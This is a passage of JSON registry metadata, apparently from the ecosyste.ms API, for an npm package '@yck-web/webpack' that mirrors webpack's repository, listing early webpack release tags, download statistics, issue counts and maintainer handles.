0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-25T20:54:40.491Z","dependent_packages_count":1,"downloads":1,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":51.222151958299555,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.0853200450146743,"forks_count":0.5291987132302153,"average":18.6777194521702},"purl":"pkg:npm/%40yck-web/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@yck-web/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@yck-web/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@yck-web/webpack/dependencies","status":"removed","funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:00:07.885Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":926,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":364617.14285714284,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":728,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.818574514038877,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":575,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":